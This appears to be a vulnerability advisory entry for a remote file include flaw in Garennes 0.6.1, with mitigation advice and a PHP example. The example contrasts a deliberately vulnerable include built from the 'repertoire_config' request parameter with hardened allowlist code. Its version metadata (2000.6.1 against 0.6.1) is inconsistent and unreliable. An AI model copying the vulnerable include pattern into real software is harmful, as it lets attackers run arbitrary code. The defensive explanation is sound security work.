vendor: Garennes
by: GolD_M
CVSS: 7.5 (HIGH)
CWE: Remote File Include
Product Name: Garennes
Affected Version From: 2000.6.1
Affected Version To: 2000.6.1
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
Garennes 0.6.1 <= Remote File Include Vulnerabilities
Garennes version 0.6.1 is vulnerable to Remote File Include. Several of its PHP files use the 'repertoire_config' parameter when including files, so an attacker can set that parameter to point at a malicious remote file, which the application then includes, leading to arbitrary code execution.
Mitigation:
To mitigate this vulnerability, it is recommended to update to a patched version of Garennes or apply appropriate security measures such as input validation and sanitization.
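
The input validation recommended above, as an added PHP example (not Garennes source code): the first function shows the assumed shape of the flaw, a request-supplied `repertoire_config` used as an include prefix, and the other two resolve the directory from a fixed allowlist instead. The function names, the `config.inc.php` file name and the directory keys are hypothetical.

```php
<?php
// Added example; not Garennes source. Function, file and directory names
// are hypothetical.

// Assumed shape of the flaw: the include prefix comes straight from the
// request, so the caller decides which file PHP executes.
function load_config_vulnerable(array $request): void
{
    $repertoire_config = $request['repertoire_config'] ?? '';
    include $repertoire_config . '/config.inc.php';
}

// Hardened form: the request may only select a key from a fixed allowlist.
// The path itself is never built from request data.
function resolve_config_dir(array $request, string $baseDir): string
{
    $allowed = [
        'default' => 'config',
        'test'    => 'config_test',
    ];
    $key = $request['repertoire_config'] ?? 'default';
    if (!is_string($key) || !isset($allowed[$key])) {
        throw new InvalidArgumentException('repertoire_config rejected');
    }

    // realpath() returns false for anything that is not an existing local
    // path, and resolves symlinks and ".." before the prefix check.
    $base = realpath($baseDir);
    $dir  = realpath($baseDir . DIRECTORY_SEPARATOR . $allowed[$key]);
    if ($base === false || $dir === false
        || strncmp($dir, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('config directory is outside the application');
    }
    return $dir;
}

function load_config_hardened(array $request, string $baseDir): void
{
    require resolve_config_dir($request, $baseDir) . '/config.inc.php';
}
```

Independently of the code change, setting `allow_url_include = Off` in php.ini stops `include` and `require` from fetching remote URLs; it does not prevent inclusion of local files, so the allowlist is still needed.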